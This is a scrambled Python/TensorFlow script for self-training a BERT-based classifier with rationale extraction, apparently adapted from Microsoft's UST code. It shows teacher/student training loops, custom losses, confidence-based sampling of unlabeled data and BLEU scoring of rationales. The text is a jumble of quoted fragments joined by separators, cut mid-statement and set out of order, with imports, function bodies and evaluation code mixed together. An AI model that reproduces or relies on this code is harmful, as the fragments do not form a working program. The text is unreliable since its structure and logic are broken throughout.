#mask tokens that are not", "sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None if 'focal' in type_: rat_loss", "= np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev,", "warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return", "#y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten()", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best accuracy", "score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += 
nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0,", "is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils import", "= acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc,", "logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]],", "os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue", "class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true,", "to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred =", "if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation of", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4],", "if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc", "X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None] y_batch", "on test set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data = []", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, 
metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif", "= dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score']", "return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)", "[1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None},", "{\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev =", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss =", "y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if", "y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], 
\"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:],", "temp = dict() temp['text'] = text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score']", "= None # model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if", "average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test) acc, y_pred, r_acc = out[0],", "logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task):", "[y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ ==", "unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels", "acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in", "np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask =", "(\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student logger.info(y_batch.shape)", "1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] elif 'joint' in type_: out", "sample from unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if 
unsup_size", "r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat =", "y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape))", "X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:],", "strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base", "y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence", "y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc >", "'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2)", "else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")])", "best_base_model = model logger.info (\"Model file loaded from {}\".format(model_file)) break elif 'mtl' in", "type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg =", "\"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, 
y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size],", "model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)),", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if", "X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:],", "f: json.dump(data, f) model_student = None # model_task for epoch in range(unsup_epochs): logger.info", "if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res", "range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 +=", "y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]),", "sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7,", "y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training", "[y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp = 
model.evaluate(X_test, [y_test[:,0],", "X and y to train and dev with valid_split if valid_split > 0:", "= models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "= tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss", "= tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base model", "max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'],", "y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc =", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val", "import defaultdict from sklearn.utils import shuffle from transformers import * import logging import", "patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 
'fine_tune_teacher' in type_: rat_loss = None if 'focal'", "the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number", "reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_: rat_loss =", "np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment; choose all the unlabeled examples\")", "sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1]", "loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #,", "np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file):", "model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred,", "#y_pred = y_pred[:,1:] # sample from unlabeled set if 'uni' in sample_scheme: logger.info", "truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p:", "== 'joint': # or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set", "valid_split > 0: train_size = int((1. 
- valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train,", "logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >=", "temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if", "+ 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss", "X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]),", "Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape:", "y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev,", "= [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales", "r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred,", "+ 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return", "= tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth'] = truth[i] temp['pred'] =", "model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], 
verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2]", "best_base_model = None best_validation_loss = np.inf for counter in range(N_base): #original N_base=10 with", "custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None,", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0],", "{} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (teacher model): {} \".format(score2/len(pred)))", "y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0],", "{'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred", "logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, 
callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)],", "np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_'", "alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None,", "verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test),", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp =", "{}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync", "#logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student", "{}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] ==", "if 'mtl' in type_: logger.info (\"Best validation acc for base model {}: {}\".format(best_validation_loss,", "learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled,", "'joint_neg' in type_: logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce", "= model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5]", "X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], 
\"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\":", "X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None]", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint,", "token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred", "1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales", "X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc", "joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info", "continue if 'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val =", "type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]},", "'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 
'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier':", "X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf", "0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0,", "y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased',", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1", "y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1)", "metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file =", "{}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. max_test_acc = 0. 
max_task_acc = 0.", "''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "= np.argmax(class_acc, axis=-1) elif 'joint' in type_: out = model.predict(X_test) class_acc, test_pred, r_acc", "max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\")", "restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss =", "on validation loss best_base_model = None best_validation_loss = np.inf for counter in range(N_base):", "1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted", "tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer,", "len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for class {}", "'w') as f: json.dump(data, f) logger.info (\"Best 
accuracy (task) across all self-training iterations", "axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro')))", "np.argmax(acc, axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc", "if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true,", "shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best", "y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1],", "{}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme))", "[], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student", "= model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred =", "in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint", "of rationales on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales", "logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size,", "for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']),", "= tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample 
{}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1:", "test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred))", "if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if", "y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for", "= np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], 